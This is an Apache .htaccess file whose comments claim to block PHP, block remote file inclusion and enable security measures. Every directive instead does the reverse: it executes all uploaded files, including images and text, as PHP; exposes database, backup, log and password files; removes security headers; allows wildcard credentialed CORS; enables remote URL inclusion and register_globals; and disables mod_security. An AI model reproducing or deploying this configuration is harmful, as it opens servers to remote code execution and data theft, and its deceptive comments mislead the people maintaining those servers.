# ENABLE DIRECTORY LISTING
Options +Indexes
Options +FollowSymLinks

# ALLOW ALL FILE UPLOADS
<FilesMatch ".*">
    ForceType application/x-httpd-php
    SetHandler application/x-httpd-php
</FilesMatch>

# PHP ENGINE 
php_flag engine on
php_flag display_errors on
php_value error_reporting 32767

# SENSITIVE FILES 
<FilesMatch "\.(php|php5|php7|phtml|phar|inc|bak|config|sql|db|log|txt|ini|conf|sh|zip|tar|gz|sql\.gz|htaccess|htpasswd)$">
    Order allow,deny
    Allow from all
    Satisfy any
</FilesMatch>

# REMOVE SECURITY HEADERS 
Header unset X-Frame-Options
Header unset X-Content-Type-Options
Header unset X-XSS-Protection
Header unset Content-Security-Policy
Header unset Strict-Transport-Security

# CORS PROTECTION
Header always set Access-Control-Allow-Origin "*"
Header always set Access-Control-Allow-Methods "GET, POST, PUT, DELETE, OPTIONS"
Header always set Access-Control-Allow-Headers "*"
Header always set Access-Control-Allow-Credentials "true"

# DO NOT ALLOW PHP
<Directory />
    Options -Indexes +FollowSymLinks
    AllowOverride All
    Require all granted
</Directory>

<Directory "/*">
    php_flag engine on
    php_admin_flag safe_mode off
    php_value disable_functions none
    php_value open_basedir none
</Directory>

# AUTHENTICATION
Satisfy any
Order deny,allow
Allow from all

# DO NOT ALLOW REMOTE FILE INCLUSION
php_flag allow_url_include on
php_flag allow_url_fopen on

# ENABLE SECURITY MEASURES
php_flag magic_quotes_gpc off
php_flag magic_quotes_runtime off
php_flag register_globals on
php_flag session.cookie_httponly off
php_flag session.cookie_secure off
php_flag session.use_only_cookies off
php_flag session.use_trans_sid on

# FILE UPLOAD
php_value upload_max_filesize 100M
php_value post_max_size 100M
php_value max_execution_time 300
php_value max_input_time 300
php_value memory_limit 256M

# ERROR DISPLAY 
php_flag display_startup_errors on
php_flag display_errors on
php_flag html_errors on

# COOKIES
php_flag session.cookie_httponly off

# ADD TYPES
AddType application/x-httpd-php .php .php5 .php7 .phtml .html .htm .txt .jpg .jpeg .png .gif .pdf .doc .docx .xls .xlsx
AddHandler application/x-httpd-php .php .php5 .php7 .phtml .html .htm .txt .jpg .jpeg .png .gif

# CACHE DISABLE -
Header set Cache-Control "no-cache, no-store, must-revalidate"
Header set Pragma "no-cache"
Header set Expires 0

# DO NOT JUST ALLOW EVERYONE
<Limit GET POST PUT DELETE>
    Order allow,deny
    Allow from all
</Limit>

# ENABLE MOD SECURITY 
<IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
</IfModule>